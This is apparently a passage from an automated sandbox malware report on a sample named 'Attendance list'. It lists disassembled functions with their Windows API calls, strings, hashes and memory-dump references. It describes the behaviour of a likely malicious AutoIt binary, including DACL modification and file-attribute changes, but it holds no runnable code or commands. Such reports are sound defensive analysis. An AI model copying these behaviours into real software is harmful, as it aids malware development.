                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0094BC03
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0094BC46
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0094BC7D
                        • FreeLibrary.KERNEL32(?), ref: 0094BC89
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0094BC99
                        • DestroyIcon.USER32(?,?,?,?,?,00949431), ref: 0094BCA8
                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0094BCC5
                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0094BCD1
                          • Part of subcall function 008E313D: __wcsicmp_l.LIBCMT ref: 008E31C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                        • String ID: .dll$.exe$.icl
                        • API String ID: 1212759294-1154884017
                        • Opcode ID: d97a33cae88ceb11b3cafb968c322b1e48f7e9af769aad0f40209ee2f5438780
                        • Instruction ID: 1f2f2f6e7bc3dcb9198b2d6a389378a776b02eccdfcacd6e6d7e2eb579e98bce
                        • Opcode Fuzzy Hash: d97a33cae88ceb11b3cafb968c322b1e48f7e9af769aad0f40209ee2f5438780
                        • Instruction Fuzzy Hash: F561E071A00219BAEB14DF68CC86FBE77ACFB09711F104619F859D61C0DB74EA90DBA0
                        Function 0092A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • CharLowerBuffW.USER32(?,?), ref: 0092A636
                        • GetDriveTypeW.KERNEL32 ref: 0092A683
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092A6CB
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092A702
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0092A730
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                        • API String ID: 2698844021-4113822522
                        • Opcode ID: 52b343bdd292c1895b6f461a4b20afe709a4b576f46d79bbe602436b21929243
                        • Instruction ID: 94fe71daaa878520f96a3fd4b60d1416fde87cd2c97af77845cda36a5421eaba
                        • Opcode Fuzzy Hash: 52b343bdd292c1895b6f461a4b20afe709a4b576f46d79bbe602436b21929243
                        • Instruction Fuzzy Hash: CB5136721042159FC700EF24D891D6AB7F8FF94718F14896CF89A97261DB31EE0ACB52
                        Function 0092A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0092A47A
                        • __swprintf.LIBCMT ref: 0092A49C
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0092A4D9
                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0092A4FE
                        • _memset.LIBCMT ref: 0092A51D
                        • _wcsncpy.LIBCMT ref: 0092A559
                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0092A58E
                        • CloseHandle.KERNEL32(00000000), ref: 0092A599
                        • RemoveDirectoryW.KERNEL32(?), ref: 0092A5A2
                        • CloseHandle.KERNEL32(00000000), ref: 0092A5AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                        • String ID: :$\$\??\%s
                        • API String ID: 2733774712-3457252023
                        • Opcode ID: 7806899f0a23197e19476c79daf0dbf860e54374f1a19e984a11c118a9572955
                        • Instruction ID: 3091e57c5333fc693502a740fae0d4a246bf4b9345efca3b7b20ef97403b91ba
                        • Opcode Fuzzy Hash: 7806899f0a23197e19476c79daf0dbf860e54374f1a19e984a11c118a9572955
                        • Instruction Fuzzy Hash: A231B0B650411AABDB219FA1DC49FEF73BCEF89701F1040B6FA08D2164E77097448B25
                        Function 0092DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                        • __wsplitpath.LIBCMT ref: 0092DC7B
                        • _wcscat.LIBCMT ref: 0092DC93
                        • _wcscat.LIBCMT ref: 0092DCA5
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0092DCBA
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0092DCCE
                        • GetFileAttributesW.KERNEL32(?), ref: 0092DCE6
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0092DD00
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0092DD12
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                        • String ID: *.*
                        • API String ID: 34673085-438819550
                        • Opcode ID: feb0654df374ff39025d24ddd0c25c1571219137028ee8ced6c698d3711a3265
                        • Instruction ID: c965b03c1cf043091f3a44b3017e09b6112d228299aab5306c35521bd433df63
                        • Opcode Fuzzy Hash: feb0654df374ff39025d24ddd0c25c1571219137028ee8ced6c698d3711a3265
                        • Instruction Fuzzy Hash: 4681A2715052619FCB20EF28D8559AAB7E8FF89310F158C2EF889C7254E774E944CB92
                        Function 0094C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C2612: GetWindowLongW.USER32(?,000000EB), ref: 008C2623
                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0094C4EC
                        • GetFocus.USER32 ref: 0094C4FC
                        • GetDlgCtrlID.USER32(00000000), ref: 0094C507
                        • _memset.LIBCMT ref: 0094C632
                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0094C65D
                        • GetMenuItemCount.USER32(?), ref: 0094C67D
                        • GetMenuItemID.USER32(?,00000000), ref: 0094C690
                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0094C6C4
                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0094C70C
                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0094C744
                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0094C779
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                        • String ID: 0
                        • API String ID: 1296962147-4108050209
                        • Opcode ID: 325277dabe02f1a57413abbc765dff91efaff97237dc740053e68afb5a31c691
                        • Instruction ID: 0907cd92e628bb5ae80e28310c8bf6095ad651b904d79952b5e5c632e5e47953
                        • Opcode Fuzzy Hash: 325277dabe02f1a57413abbc765dff91efaff97237dc740053e68afb5a31c691
                        • Instruction Fuzzy Hash: 3B818EB420A306AFD760DF14C984E6BBBE8FB89314F00492DF99597291D770E905DFA2
                        Function 009183F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0091874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00918766
                          • Part of subcall function 0091874A: GetLastError.KERNEL32(?,0091822A,?,?,?), ref: 00918770
                          • Part of subcall function 0091874A: GetProcessHeap.KERNEL32(00000008,?,?,0091822A,?,?,?), ref: 0091877F
                          • Part of subcall function 0091874A: HeapAlloc.KERNEL32(00000000,?,0091822A,?,?,?), ref: 00918786
                          • Part of subcall function 0091874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0091879D
                          • Part of subcall function 009187E7: GetProcessHeap.KERNEL32(00000008,00918240,00000000,00000000,?,00918240,?), ref: 009187F3
                          • Part of subcall function 009187E7: HeapAlloc.KERNEL32(00000000,?,00918240,?), ref: 009187FA
                          • Part of subcall function 009187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00918240,?), ref: 0091880B
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00918458
                        • _memset.LIBCMT ref: 0091846D
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0091848C
                        • GetLengthSid.ADVAPI32(?), ref: 0091849D
                        • GetAce.ADVAPI32(?,00000000,?), ref: 009184DA
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009184F6
                        • GetLengthSid.ADVAPI32(?), ref: 00918513
                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00918522
                        • HeapAlloc.KERNEL32(00000000), ref: 00918529
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0091854A
                        • CopySid.ADVAPI32(00000000), ref: 00918551
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00918582
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009185A8
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009185BC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                        • String ID:
                        • API String ID: 3996160137-0
                        • Opcode ID: a0306a563c12398696914d5f0ef0a7c93f56885cfe667dd83c1a480f518af95d
                        • Instruction ID: 814bf53866bb20f0fc681a2bab9d2fafd42bbfb4cf746966f8036ad798aa39b3
                        • Opcode Fuzzy Hash: a0306a563c12398696914d5f0ef0a7c93f56885cfe667dd83c1a480f518af95d
                        • Instruction Fuzzy Hash: 98615B75A0020AABDF10DF94DC44EEEBBBDFF45310F048169F815A6291DB309A44EF60
                        Function 0093762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetDC.USER32(00000000), ref: 009376A2
                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009376AE
                        • CreateCompatibleDC.GDI32(?), ref: 009376BA
                        • SelectObject.GDI32(00000000,?), ref: 009376C7
                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0093771B
                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00937757
                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0093777B
                        • SelectObject.GDI32(00000006,?), ref: 00937783
                        • DeleteObject.GDI32(?), ref: 0093778C
                        • DeleteDC.GDI32(00000006), ref: 00937793
                        • ReleaseDC.USER32(00000000,?), ref: 0093779E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                        • String ID: (
                        • API String ID: 2598888154-3887548279
                        • Opcode ID: 5de641b95b6b7560c647b3e47343f1bada693caa9ae9c88ce0eff7f9cfb54dde
                        • Instruction ID: 93532081e6d1640d7e42bfffaa0e09cf8c4e84dc72ff1e11eee1da8781a46fc0
                        • Opcode Fuzzy Hash: 5de641b95b6b7560c647b3e47343f1bada693caa9ae9c88ce0eff7f9cfb54dde
                        • Instruction Fuzzy Hash: 165139B5904209EFCB25CFA8CC95EAEBBB9EF49710F14852DF95A97210D731A940CF60
                        Function 0092A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,0094FB78), ref: 0092A0FC
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 0092A11E
                        • __swprintf.LIBCMT ref: 0092A177
                        • __swprintf.LIBCMT ref: 0092A190
                        • _wprintf.LIBCMT ref: 0092A246
                        • _wprintf.LIBCMT ref: 0092A264
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: LoadString__swprintf_wprintf$_memmove
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 311963372-2391861430
                        • Opcode ID: 3fe2c6df0a646d90d39758359a5357f2a9d658d0c15f8c0e2ca3d587c9b174f0
                        • Instruction ID: c5d3bc79130fa134acf9e4eb8b0d43ea89f0e22ac613a3d248c461960233c739
                        • Opcode Fuzzy Hash: 3fe2c6df0a646d90d39758359a5357f2a9d658d0c15f8c0e2ca3d587c9b174f0
                        • Instruction Fuzzy Hash: 79518E3290411AABCF15EBA4DD86EEEB779FF04300F100169B515B21A1EB35AF58DF62
                        Function 008C6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008E0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008C6C6C,?,00008000), ref: 008E0BB7
                          • Part of subcall function 008C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C48A1,?,?,008C37C0,?), ref: 008C48CE
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008C6D0D
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 008C6E5A
                          • Part of subcall function 008C59CD: _wcscpy.LIBCMT ref: 008C5A05
                          • Part of subcall function 008E387D: _iswctype.LIBCMT ref: 008E3885
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                        • API String ID: 537147316-1018226102
                        • Opcode ID: 80c1fb2a8496e393306142af67c833f8def7f031fdd4dea61b65edbe2f3bf09d
                        • Instruction ID: 34cf7c7de1a418b229eb0e24ae8fe6d1229ac36e89e315abbc42c41ea6e92f4e
                        • Opcode Fuzzy Hash: 80c1fb2a8496e393306142af67c833f8def7f031fdd4dea61b65edbe2f3bf09d
                        • Instruction Fuzzy Hash: D20256311083459ECB24EF28C891EAEBBF5FF95354F14492DF586972A1DB30E989CB42
                        Function 008C45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 008C45F9
                        • GetMenuItemCount.USER32(00986890), ref: 008FD7CD
                        • GetMenuItemCount.USER32(00986890), ref: 008FD87D
                        • GetCursorPos.USER32(?), ref: 008FD8C1
                        • SetForegroundWindow.USER32(00000000), ref: 008FD8CA
                        • TrackPopupMenuEx.USER32(00986890,00000000,?,00000000,00000000,00000000), ref: 008FD8DD
                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008FD8E9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                        • String ID:
                        • API String ID: 2751501086-0
                        • Opcode ID: 360c52dce1c8c53602aeee80e08d4669f0995cd5733a0695a5f045f6bf432ebf
                        • Instruction ID: bbc16caa765a92d2a72160df5ddbdd4764ff29385d680d51dd841bcda134b438
                        • Opcode Fuzzy Hash: 360c52dce1c8c53602aeee80e08d4669f0995cd5733a0695a5f045f6bf432ebf
                        • Instruction Fuzzy Hash: 5B71F33160521ABAFB209F24DC55FBABF65FF05368F204216F725EA1E1C7B19850DB90
                        Function 009410A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00940038,?,?), ref: 009410BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                        • API String ID: 3964851224-909552448
                        • Opcode ID: 7f13fa67f22a0a6f2af0933992d23f0bc4ff6f3d46362558017008bd959dd8c9
                        • Instruction ID: 7526b0620b0803ada9fb946352cdee11cadde816dafaec6bd28cc6972a22a645
                        • Opcode Fuzzy Hash: 7f13fa67f22a0a6f2af0933992d23f0bc4ff6f3d46362558017008bd959dd8c9
                        • Instruction Fuzzy Hash: 72419F3125438E8BCF20EF94DC91EEA3764FF16310F508914FCA59B251DB74A99ACB51
                        Function 00925569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                          • Part of subcall function 008C7A84: _memmove.LIBCMT ref: 008C7B0D
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009255D2
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009255E8
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009255F9
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0092560B
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0092561C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: SendString$_memmove
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 2279737902-1007645807
                        • Opcode ID: a75edf77146e42a4c0f0a1fe2c65139114988a0dd77681a831b5c35be023e092
                        • Instruction ID: 55f5d840a1866bcf9a401b0f0b6a93da61468c26feae61df9aec4770ab9e50f4
                        • Opcode Fuzzy Hash: a75edf77146e42a4c0f0a1fe2c65139114988a0dd77681a831b5c35be023e092
                        • Instruction Fuzzy Hash: 9F11B22255016979E720BA65EC8AEFF7B7CFFD1F04F404429B405E20D5EEB05D05C9A2
                        Function 009248F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                        • String ID: 0.0.0.0
                        • API String ID: 208665112-3771769585
                        • Opcode ID: 04a24b7d0e6c089a39a67294a584b5fc121c5d01555f9fe8d74b8e71b62f8c43
                        • Instruction ID: 3636e0f74c7ad72dfd4b2cccf777a4b8981a820a75d7787fdaa8fc9dc487174a
                        • Opcode Fuzzy Hash: 04a24b7d0e6c089a39a67294a584b5fc121c5d01555f9fe8d74b8e71b62f8c43
                        • Instruction Fuzzy Hash: 6D11E739908125ABDB20EB24EC0AEDF77BCEF42B10F040175F449D6155EF749AC19652
                        Function 00925217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • timeGetTime.WINMM ref: 0092521C
                          • Part of subcall function 008E0719: timeGetTime.WINMM(?,75A8B400,008D0FF9), ref: 008E071D
                        • Sleep.KERNEL32(0000000A), ref: 00925248
                        • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0092526C
                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0092528E
                        • SetActiveWindow.USER32 ref: 009252AD
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009252BB
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 009252DA
                        • Sleep.KERNEL32(000000FA), ref: 009252E5
                        • IsWindow.USER32 ref: 009252F1
                        • EndDialog.USER32(00000000), ref: 00925302
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
